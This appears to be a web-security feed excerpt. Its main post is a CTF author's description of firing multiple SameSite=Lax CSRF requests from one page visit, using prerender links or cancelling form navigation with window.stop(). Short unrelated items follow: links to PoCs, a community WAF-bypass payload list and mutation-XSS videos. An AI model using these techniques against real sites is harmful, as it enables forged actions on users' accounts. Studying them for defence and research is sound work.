During a recent CTF, one participant found a particularly interesting solution to my challenge. The goal was to send multiple CSRF requests with SameSite=Lax from 1 visit.
Normally, a form sends you to the page you are posting to and you cannot send any more CSRF requests.

My intended solution was to use <link rel="prerender" href="..."> to send an authenticated GET request to the CSRF-able endpoint, repeatable without leaving the attacker's page. Prerender represents the full navigation as closely as possible, sending SameSite=Lax cookies.

The unintended technique was something I hadn't seen before. Regular CSRFs often use <form>'s for top-level navigations, but it seems like we cannot control the browser anymore after submitting the form.
But, by cancelling the navigation, it is possible to regain control.


After the request is sent, while waiting for a response from the target, call window.stop() or submit another form to cancel the previous form. Timing can be measured and is surprisingly consistent. Check out the PoC's here:

https://gist.github.com/JorianWoltjer/b9163fe616319db8fe570b4ef9c02291



reference:
https://x.com/J0R1AN/status/1842139861295169836

#csrf #twitter

Attacking Secondary Contexts in Web Applications

خیلی عالیههه🔥

Reverse-proxies-Inconsistency

guys have a look this contains all waf bypass payloads people posted that worked for them this will help you better in wafbypass on bbp..
https://github.com/waf-bypass-maker/waf-community-bypasses/blob/main/payloads.twitter.csv

MXSS Explained Part 1: Why Server-Side HTML Sanitizers Are Doomed to Fail with this XSS!

https://youtu.be/aczTceXp49U?si=t6mJ5NEOioD0i9XK

MXSS Part 2: Why Client-Side HTML Sanitization is hard

https://youtu.be/vVwo5tW6d3w?si=6Q-daqfd_F8Mwh7z